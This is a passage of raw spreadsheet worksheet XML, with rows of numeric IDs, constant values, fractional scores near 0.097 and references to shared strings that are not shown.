      </c>
      <c r="D10645" s="2">
        <v>1.0</v>
      </c>
      <c r="E10645" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10645" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="10646" ht="15.75" customHeight="1">
      <c r="A10646" s="1">
        <v>26206.0</v>
      </c>
      <c r="B10646" s="2">
        <v>1.6237407E7</v>
      </c>
      <c r="C10646" s="2" t="s">
        <v>10196</v>
      </c>
      <c r="D10646" s="2">
        <v>1.0</v>
      </c>
      <c r="E10646" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10646" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="10647" ht="15.75" customHeight="1">
      <c r="A10647" s="1">
        <v>3081.0</v>
      </c>
      <c r="B10647" s="2">
        <v>3.6600611E7</v>
      </c>
      <c r="C10647" s="2" t="s">
        <v>10197</v>
      </c>
      <c r="D10647" s="2">
        <v>1.0</v>
      </c>
      <c r="E10647" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10647" s="2">
        <v>0.09773662551440325</v>
      </c>
    </row>
    <row r="10648" ht="15.75" customHeight="1">
      <c r="A10648" s="1">
        <v>1207.0</v>
      </c>
      <c r="B10648" s="2">
        <v>2.4834189E7</v>
      </c>
      <c r="C10648" s="2" t="s">
        <v>10198</v>
      </c>
      <c r="D10648" s="2">
        <v>1.0</v>
      </c>
      <c r="E10648" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10648" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="10649" ht="15.75" customHeight="1">
      <c r="A10649" s="1">
        <v>2210.0</v>
      </c>
      <c r="B10649" s="2">
        <v>3.2076284E7</v>
      </c>
      <c r="C10649" s="2" t="s">
        <v>10199</v>
      </c>
      <c r="D10649" s="2">
        <v>1.0</v>
      </c>
      <c r="E10649" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10649" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="10650" ht="15.75" customHeight="1">
      <c r="A10650" s="1">
        <v>2381.0</v>
      </c>
      <c r="B10650" s="2">
        <v>3.3320817E7</v>
      </c>
      <c r="C10650" s="2" t="s">
        <v>10200</v>
      </c>
      <c r="D10650" s="2">
        <v>1.0</v>
      </c>
      <c r="E10650" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10650" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="10651" ht="15.75" customHeight="1">
      <c r="A10651" s="1">
        <v>4940.0</v>
      </c>
      <c r="B10651" s="2">
        <v>4.4007315E7</v>
      </c>
      <c r="C10651" s="2" t="s">
        <v>10201</v>
      </c>
      <c r="D10651" s="2">
        <v>1.0</v>
      </c>
      <c r="E10651" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10651" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="10652" ht="15.75" customHeight="1">
      <c r="A10652" s="1">
        <v>6647.0</v>
      </c>
      <c r="B10652" s="2">
        <v>4.9083939E7</v>
      </c>
      <c r="C10652" s="2" t="s">
        <v>10202</v>
      </c>
      <c r="D10652" s="2">
        <v>1.0</v>
      </c>
      <c r="E10652" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10652" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="10653" ht="15.75" customHeight="1">
      <c r="A10653" s="1">
        <v>8460.0</v>
      </c>
      <c r="B10653" s="2">
        <v>5.4003799E7</v>
      </c>
      <c r="C10653" s="2" t="s">
        <v>10203</v>
      </c>
      <c r="D10653" s="2">
        <v>1.0</v>
      </c>
      <c r="E10653" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10653" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="10654" ht="15.75" customHeight="1">
      <c r="A10654" s="1">
        <v>9147.0</v>
      </c>
      <c r="B10654" s="2">
        <v>5.5264738E7</v>
      </c>
      <c r="C10654" s="2" t="s">
        <v>10204</v>
      </c>
      <c r="D10654" s="2">
        <v>1.0</v>
      </c>
      <c r="E10654" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10654" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="10655" ht="15.75" customHeight="1">
      <c r="A10655" s="1">
        <v>10727.0</v>
      </c>
      <c r="B10655" s="2">
        <v>1.5212603E7</v>
      </c>
      <c r="C10655" s="2" t="s">
        <v>10205</v>
      </c>
      <c r="D10655" s="2">
        <v>1.0</v>
      </c>
      <c r="E10655" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10655" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="10656" ht="15.75" customHeight="1">
      <c r="A10656" s="1">
        <v>11209.0</v>
      </c>
      <c r="B10656" s="2">
        <v>2.0066791E7</v>
      </c>
      <c r="C10656" s="2" t="s">
        <v>10206</v>
      </c>
      <c r="D10656" s="2">
        <v>1.0</v>
      </c>
      <c r="E10656" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10656" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="10657" ht="15.75" customHeight="1">
      <c r="A10657" s="1">
        <v>12231.0</v>
      </c>
      <c r="B10657" s="2">
        <v>2.7846146E7</v>
      </c>
      <c r="C10657" s="2" t="s">
        <v>10207</v>
      </c>
      <c r="D10657" s="2">
        <v>1.0</v>
      </c>
      <c r="E10657" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10657" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="10658" ht="15.75" customHeight="1">
      <c r="A10658" s="1">
        <v>12553.0</v>
      </c>
      <c r="B10658" s="2">
        <v>2.9873338E7</v>
      </c>
      <c r="C10658" s="2" t="s">
        <v>10208</v>
      </c>
      <c r="D10658" s="2">
        <v>1.0</v>
      </c>
      <c r="E10658" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10658" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="10659" ht="15.75" customHeight="1">
      <c r="A10659" s="1">
        <v>13267.0</v>
      </c>
      <c r="B10659" s="2">
        <v>3.4362462E7</v>
      </c>
      <c r="C10659" s="2" t="s">
        <v>10209</v>
      </c>
      <c r="D10659" s="2">
        <v>1.0</v>
      </c>
      <c r="E10659" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10659" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="10660" ht="15.75" customHeight="1">
      <c r="A10660" s="1">
        <v>16941.0</v>
      </c>
      <c r="B10660" s="2">
        <v>4.8204098E7</v>
      </c>
      <c r="C10660" s="2" t="s">
        <v>10210</v>
      </c>
      <c r="D10660" s="2">
        <v>1.0</v>
      </c>
      <c r="E10660" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10660" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="10661" ht="15.75" customHeight="1">
      <c r="A10661" s="1">
        <v>19386.0</v>
      </c>
      <c r="B10661" s="2">
        <v>5.5511609E7</v>
      </c>
      <c r="C10661" s="2" t="s">
        <v>10211</v>
      </c>
      <c r="D10661" s="2">
        <v>1.0</v>
      </c>
      <c r="E10661" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10661" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="10662" ht="15.75" customHeight="1">
      <c r="A10662" s="1">
        <v>22223.0</v>
      </c>
      <c r="B10662" s="2">
        <v>3.2308906E7</v>
      </c>
      <c r="C10662" s="2" t="s">
        <v>10212</v>
      </c>
      <c r="D10662" s="2">
        <v>1.0</v>
      </c>
      <c r="E10662" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10662" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="10663" ht="15.75" customHeight="1">
      <c r="A10663" s="1">
        <v>26655.0</v>
      </c>
      <c r="B10663" s="2">
        <v>1.8059799E7</v>
      </c>
      <c r="C10663" s="2" t="s">
        <v>10213</v>
      </c>
      <c r="D10663" s="2">
        <v>1.0</v>
      </c>
      <c r="E10663" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10663" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="10664" ht="15.75" customHeight="1">
      <c r="A10664" s="1">
        <v>27657.0</v>
      </c>
      <c r="B10664" s="2">
        <v>2.286279E7</v>
      </c>
      <c r="C10664" s="2" t="s">
        <v>10214</v>
      </c>
      <c r="D10664" s="2">
        <v>1.0</v>
      </c>
      <c r="E10664" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10664" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="10665" ht="15.75" customHeight="1">
      <c r="A10665" s="1">
        <v>30316.0</v>
      </c>
      <c r="B10665" s="2">
        <v>3.8012387E7</v>
      </c>
      <c r="C10665" s="2" t="s">
        <v>10215</v>
      </c>
      <c r="D10665" s="2">
        <v>1.0</v>
      </c>
      <c r="E10665" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10665" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="10666" ht="15.75" customHeight="1">
      <c r="A10666" s="1">
        <v>66.0</v>
      </c>
      <c r="B10666" s="2">
        <v>1.1303396E7</v>
      </c>
      <c r="C10666" s="2" t="s">
        <v>10216</v>
      </c>
      <c r="D10666" s="2">
        <v>1.0</v>
      </c>
      <c r="E10666" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10666" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10667" ht="15.75" customHeight="1">
      <c r="A10667" s="1">
        <v>193.0</v>
      </c>
      <c r="B10667" s="2">
        <v>1.438969E7</v>
      </c>
      <c r="C10667" s="2" t="s">
        <v>10217</v>
      </c>
      <c r="D10667" s="2">
        <v>1.0</v>
      </c>
      <c r="E10667" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10667" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10668" ht="15.75" customHeight="1">
      <c r="A10668" s="1">
        <v>199.0</v>
      </c>
      <c r="B10668" s="2">
        <v>1.4435257E7</v>
      </c>
      <c r="C10668" s="2" t="s">
        <v>10218</v>
      </c>
      <c r="D10668" s="2">
        <v>1.0</v>
      </c>
      <c r="E10668" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10668" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10669" ht="15.75" customHeight="1">
      <c r="A10669" s="1">
        <v>241.0</v>
      </c>
      <c r="B10669" s="2">
        <v>1.4913809E7</v>
      </c>
      <c r="C10669" s="2" t="s">
        <v>10219</v>
      </c>
      <c r="D10669" s="2">
        <v>1.0</v>
      </c>
      <c r="E10669" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10669" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10670" ht="15.75" customHeight="1">
      <c r="A10670" s="1">
        <v>328.0</v>
      </c>
      <c r="B10670" s="2">
        <v>1.5736036E7</v>
      </c>
      <c r="C10670" s="2" t="s">
        <v>10220</v>
      </c>
      <c r="D10670" s="2">
        <v>1.0</v>
      </c>
      <c r="E10670" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10670" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10671" ht="15.75" customHeight="1">
      <c r="A10671" s="1">
        <v>348.0</v>
      </c>
      <c r="B10671" s="2">
        <v>1.6020456E7</v>
      </c>
      <c r="C10671" s="2" t="s">
        <v>10221</v>
      </c>
      <c r="D10671" s="2">
        <v>1.0</v>
      </c>
      <c r="E10671" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10671" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10672" ht="15.75" customHeight="1">
      <c r="A10672" s="1">
        <v>393.0</v>
      </c>
      <c r="B10672" s="2">
        <v>1.6526466E7</v>
      </c>
      <c r="C10672" s="2" t="s">
        <v>10222</v>
      </c>
      <c r="D10672" s="2">
        <v>1.0</v>
      </c>
      <c r="E10672" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10672" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10673" ht="15.75" customHeight="1">
      <c r="A10673" s="1">
        <v>406.0</v>
      </c>
      <c r="B10673" s="2">
        <v>1.6682305E7</v>
      </c>
      <c r="C10673" s="2" t="s">
        <v>10223</v>
      </c>
      <c r="D10673" s="2">
        <v>1.0</v>
      </c>
      <c r="E10673" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10673" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10674" ht="15.75" customHeight="1">
      <c r="A10674" s="1">
        <v>510.0</v>
      </c>
      <c r="B10674" s="2">
        <v>1.8152026E7</v>
      </c>
      <c r="C10674" s="2" t="s">
        <v>10224</v>
      </c>
      <c r="D10674" s="2">
        <v>1.0</v>
      </c>
      <c r="E10674" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10674" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10675" ht="15.75" customHeight="1">
      <c r="A10675" s="1">
        <v>515.0</v>
      </c>
      <c r="B10675" s="2">
        <v>1.8185802E7</v>
      </c>
      <c r="C10675" s="2" t="s">
        <v>10225</v>
      </c>
      <c r="D10675" s="2">
        <v>1.0</v>
      </c>
      <c r="E10675" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10675" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10676" ht="15.75" customHeight="1">
      <c r="A10676" s="1">
        <v>580.0</v>
      </c>
      <c r="B10676" s="2">
        <v>1.91187E7</v>
      </c>
      <c r="C10676" s="2" t="s">
        <v>10226</v>
      </c>
      <c r="D10676" s="2">
        <v>1.0</v>
      </c>
      <c r="E10676" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10676" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10677" ht="15.75" customHeight="1">
      <c r="A10677" s="1">
        <v>609.0</v>
      </c>
      <c r="B10677" s="2">
        <v>1.9409556E7</v>
      </c>
      <c r="C10677" s="2" t="s">
        <v>10227</v>
      </c>
      <c r="D10677" s="2">
        <v>1.0</v>
      </c>
      <c r="E10677" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10677" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10678" ht="15.75" customHeight="1">
      <c r="A10678" s="1">
        <v>699.0</v>
      </c>
      <c r="B10678" s="2">
        <v>2.0457698E7</v>
      </c>
      <c r="C10678" s="2" t="s">
        <v>10228</v>
      </c>
      <c r="D10678" s="2">
        <v>1.0</v>
      </c>
      <c r="E10678" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10678" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10679" ht="15.75" customHeight="1">
      <c r="A10679" s="1">
        <v>704.0</v>
      </c>
      <c r="B10679" s="2">
        <v>2.0470626E7</v>
      </c>
      <c r="C10679" s="2" t="s">
        <v>10229</v>
      </c>
      <c r="D10679" s="2">
        <v>1.0</v>
      </c>
      <c r="E10679" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10679" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10680" ht="15.75" customHeight="1">
      <c r="A10680" s="1">
        <v>875.0</v>
      </c>
      <c r="B10680" s="2">
        <v>2.1900915E7</v>
      </c>
      <c r="C10680" s="2" t="s">
        <v>10230</v>
      </c>
      <c r="D10680" s="2">
        <v>1.0</v>
      </c>
      <c r="E10680" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10680" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10681" ht="15.75" customHeight="1">
      <c r="A10681" s="1">
        <v>1156.0</v>
      </c>
      <c r="B10681" s="2">
        <v>2.4469445E7</v>
      </c>
      <c r="C10681" s="2" t="s">
        <v>10231</v>
      </c>
      <c r="D10681" s="2">
        <v>1.0</v>
      </c>
      <c r="E10681" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10681" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10682" ht="15.75" customHeight="1">
      <c r="A10682" s="1">
        <v>1377.0</v>
      </c>
      <c r="B10682" s="2">
        <v>2.6035661E7</v>
      </c>
      <c r="C10682" s="2" t="s">
        <v>10232</v>
      </c>
      <c r="D10682" s="2">
        <v>1.0</v>
      </c>
      <c r="E10682" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10682" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10683" ht="15.75" customHeight="1">
      <c r="A10683" s="1">
        <v>1416.0</v>
      </c>
      <c r="B10683" s="2">
        <v>2.6503293E7</v>
      </c>
      <c r="C10683" s="2" t="s">
        <v>10233</v>
      </c>
      <c r="D10683" s="2">
        <v>1.0</v>
      </c>
      <c r="E10683" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10683" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10684" ht="15.75" customHeight="1">
      <c r="A10684" s="1">
        <v>1438.0</v>
      </c>
      <c r="B10684" s="2">
        <v>2.6695227E7</v>
      </c>
      <c r="C10684" s="2" t="s">
        <v>10234</v>
      </c>
      <c r="D10684" s="2">
        <v>1.0</v>
      </c>
      <c r="E10684" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10684" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10685" ht="15.75" customHeight="1">
      <c r="A10685" s="1">
        <v>1463.0</v>
      </c>
      <c r="B10685" s="2">
        <v>2.6907588E7</v>
      </c>
      <c r="C10685" s="2" t="s">
        <v>10235</v>
      </c>
      <c r="D10685" s="2">
        <v>1.0</v>
      </c>
      <c r="E10685" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10685" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10686" ht="15.75" customHeight="1">
      <c r="A10686" s="1">
        <v>1535.0</v>
      </c>
      <c r="B10686" s="2">
        <v>2.7532208E7</v>
      </c>
      <c r="C10686" s="2" t="s">
        <v>10236</v>
      </c>
      <c r="D10686" s="2">
        <v>1.0</v>
      </c>
      <c r="E10686" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10686" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10687" ht="15.75" customHeight="1">
      <c r="A10687" s="1">
        <v>1550.0</v>
      </c>
      <c r="B10687" s="2">
        <v>2.75731E7</v>
      </c>
      <c r="C10687" s="2" t="s">
        <v>10237</v>
      </c>
      <c r="D10687" s="2">
        <v>1.0</v>
      </c>
      <c r="E10687" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10687" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10688" ht="15.75" customHeight="1">
      <c r="A10688" s="1">
        <v>1679.0</v>
      </c>
      <c r="B10688" s="2">
        <v>2.838377E7</v>
      </c>
      <c r="C10688" s="2" t="s">
        <v>10238</v>
      </c>
      <c r="D10688" s="2">
        <v>1.0</v>
      </c>
      <c r="E10688" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10688" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10689" ht="15.75" customHeight="1">
      <c r="A10689" s="1">
        <v>1683.0</v>
      </c>
      <c r="B10689" s="2">
        <v>2.8414563E7</v>
      </c>
      <c r="C10689" s="2" t="s">
        <v>10239</v>
      </c>
      <c r="D10689" s="2">
        <v>1.0</v>
      </c>
      <c r="E10689" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10689" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10690" ht="15.75" customHeight="1">
      <c r="A10690" s="1">
        <v>1732.0</v>
      </c>
      <c r="B10690" s="2">
        <v>2.8753762E7</v>
      </c>
      <c r="C10690" s="2" t="s">
        <v>10240</v>
      </c>
      <c r="D10690" s="2">
        <v>1.0</v>
      </c>
      <c r="E10690" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10690" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10691" ht="15.75" customHeight="1">
      <c r="A10691" s="1">
        <v>1805.0</v>
      </c>
      <c r="B10691" s="2">
        <v>2.9173655E7</v>
      </c>
      <c r="C10691" s="2" t="s">
        <v>10241</v>
      </c>
      <c r="D10691" s="2">
        <v>1.0</v>
      </c>
      <c r="E10691" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10691" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10692" ht="15.75" customHeight="1">
      <c r="A10692" s="1">
        <v>1860.0</v>
      </c>
      <c r="B10692" s="2">
        <v>2.949634E7</v>
      </c>
      <c r="C10692" s="2" t="s">
        <v>10242</v>
      </c>
      <c r="D10692" s="2">
        <v>1.0</v>
      </c>
      <c r="E10692" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10692" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10693" ht="15.75" customHeight="1">
      <c r="A10693" s="1">
        <v>1930.0</v>
      </c>
      <c r="B10693" s="2">
        <v>3.0153534E7</v>
      </c>
      <c r="C10693" s="2" t="s">
        <v>10243</v>
      </c>
      <c r="D10693" s="2">
        <v>1.0</v>
      </c>
      <c r="E10693" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10693" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10694" ht="15.75" customHeight="1">
      <c r="A10694" s="1">
        <v>1966.0</v>
      </c>
      <c r="B10694" s="2">
        <v>3.0361166E7</v>
      </c>
      <c r="C10694" s="2" t="s">
        <v>10244</v>
      </c>
      <c r="D10694" s="2">
        <v>1.0</v>
      </c>
      <c r="E10694" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10694" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10695" ht="15.75" customHeight="1">
      <c r="A10695" s="1">
        <v>2027.0</v>
      </c>
      <c r="B10695" s="2">
        <v>3.0785514E7</v>
      </c>
      <c r="C10695" s="2" t="s">
        <v>10245</v>
      </c>
      <c r="D10695" s="2">
        <v>1.0</v>
      </c>
      <c r="E10695" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10695" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10696" ht="15.75" customHeight="1">
      <c r="A10696" s="1">
        <v>2288.0</v>
      </c>
      <c r="B10696" s="2">
        <v>3.2580201E7</v>
      </c>
      <c r="C10696" s="2" t="s">
        <v>10246</v>
      </c>
      <c r="D10696" s="2">
        <v>1.0</v>
      </c>
      <c r="E10696" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10696" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10697" ht="15.75" customHeight="1">
      <c r="A10697" s="1">
        <v>2291.0</v>
      </c>
      <c r="B10697" s="2">
        <v>3.2615416E7</v>
      </c>
      <c r="C10697" s="2" t="s">
        <v>10247</v>
      </c>
      <c r="D10697" s="2">
        <v>1.0</v>
      </c>
      <c r="E10697" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10697" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10698" ht="15.75" customHeight="1">
      <c r="A10698" s="1">
        <v>2373.0</v>
      </c>
      <c r="B10698" s="2">
        <v>3.324431E7</v>
      </c>
      <c r="C10698" s="2" t="s">
        <v>10248</v>
      </c>
      <c r="D10698" s="2">
        <v>1.0</v>
      </c>
      <c r="E10698" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10698" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10699" ht="15.75" customHeight="1">
      <c r="A10699" s="1">
        <v>2424.0</v>
      </c>
      <c r="B10699" s="2">
        <v>3.3580773E7</v>
      </c>
      <c r="C10699" s="2" t="s">
        <v>10249</v>
      </c>
      <c r="D10699" s="2">
        <v>1.0</v>
      </c>
      <c r="E10699" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10699" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10700" ht="15.75" customHeight="1">
      <c r="A10700" s="1">
        <v>2580.0</v>
      </c>
      <c r="B10700" s="2">
        <v>3.4298032E7</v>
      </c>
      <c r="C10700" s="2" t="s">
        <v>10250</v>
      </c>
      <c r="D10700" s="2">
        <v>1.0</v>
      </c>
      <c r="E10700" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10700" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10701" ht="15.75" customHeight="1">
      <c r="A10701" s="1">
        <v>3076.0</v>
      </c>
      <c r="B10701" s="2">
        <v>3.6542855E7</v>
      </c>
      <c r="C10701" s="2" t="s">
        <v>10251</v>
      </c>
      <c r="D10701" s="2">
        <v>1.0</v>
      </c>
      <c r="E10701" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10701" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10702" ht="15.75" customHeight="1">
      <c r="A10702" s="1">
        <v>3142.0</v>
      </c>
      <c r="B10702" s="2">
        <v>3.6921234E7</v>
      </c>
      <c r="C10702" s="2" t="s">
        <v>10252</v>
      </c>
      <c r="D10702" s="2">
        <v>1.0</v>
      </c>
      <c r="E10702" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10702" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10703" ht="15.75" customHeight="1">
      <c r="A10703" s="1">
        <v>3274.0</v>
      </c>
      <c r="B10703" s="2">
        <v>3.7486296E7</v>
      </c>
      <c r="C10703" s="2" t="s">
        <v>10253</v>
      </c>
      <c r="D10703" s="2">
        <v>1.0</v>
      </c>
      <c r="E10703" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10703" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10704" ht="15.75" customHeight="1">
      <c r="A10704" s="1">
        <v>3380.0</v>
      </c>
      <c r="B10704" s="2">
        <v>3.7942333E7</v>
      </c>
      <c r="C10704" s="2" t="s">
        <v>10254</v>
      </c>
      <c r="D10704" s="2">
        <v>1.0</v>
      </c>
      <c r="E10704" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10704" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10705" ht="15.75" customHeight="1">
      <c r="A10705" s="1">
        <v>3693.0</v>
      </c>
      <c r="B10705" s="2">
        <v>3.9527809E7</v>
      </c>
      <c r="C10705" s="2" t="s">
        <v>10255</v>
      </c>
      <c r="D10705" s="2">
        <v>1.0</v>
      </c>
      <c r="E10705" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10705" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10706" ht="15.75" customHeight="1">
      <c r="A10706" s="1">
        <v>3719.0</v>
      </c>
      <c r="B10706" s="2">
        <v>3.9612333E7</v>
      </c>
      <c r="C10706" s="2" t="s">
        <v>10256</v>
      </c>
      <c r="D10706" s="2">
        <v>1.0</v>
      </c>
      <c r="E10706" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10706" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10707" ht="15.75" customHeight="1">
      <c r="A10707" s="1">
        <v>4396.0</v>
      </c>
      <c r="B10707" s="2">
        <v>4.2264358E7</v>
      </c>
      <c r="C10707" s="2" t="s">
        <v>10257</v>
      </c>
      <c r="D10707" s="2">
        <v>1.0</v>
      </c>
      <c r="E10707" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10707" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10708" ht="15.75" customHeight="1">
      <c r="A10708" s="1">
        <v>5096.0</v>
      </c>
      <c r="B10708" s="2">
        <v>4.4500395E7</v>
      </c>
      <c r="C10708" s="2" t="s">
        <v>10258</v>
      </c>
      <c r="D10708" s="2">
        <v>1.0</v>
      </c>
      <c r="E10708" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10708" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10709" ht="15.75" customHeight="1">
      <c r="A10709" s="1">
        <v>5184.0</v>
      </c>
      <c r="B10709" s="2">
        <v>4.4782499E7</v>
      </c>
      <c r="C10709" s="2" t="s">
        <v>10259</v>
      </c>
      <c r="D10709" s="2">
        <v>1.0</v>
      </c>
      <c r="E10709" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10709" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10710" ht="15.75" customHeight="1">
      <c r="A10710" s="1">
        <v>5199.0</v>
      </c>
      <c r="B10710" s="2">
        <v>4.4862205E7</v>
      </c>
      <c r="C10710" s="2" t="s">
        <v>10260</v>
      </c>
      <c r="D10710" s="2">
        <v>1.0</v>
      </c>
      <c r="E10710" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10710" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10711" ht="15.75" customHeight="1">
      <c r="A10711" s="1">
        <v>5205.0</v>
      </c>
      <c r="B10711" s="2">
        <v>4.490999E7</v>
      </c>
      <c r="C10711" s="2" t="s">
        <v>10261</v>
      </c>
      <c r="D10711" s="2">
        <v>1.0</v>
      </c>
      <c r="E10711" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10711" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10712" ht="15.75" customHeight="1">
      <c r="A10712" s="1">
        <v>5351.0</v>
      </c>
      <c r="B10712" s="2">
        <v>4.5364877E7</v>
      </c>
      <c r="C10712" s="2" t="s">
        <v>10262</v>
      </c>
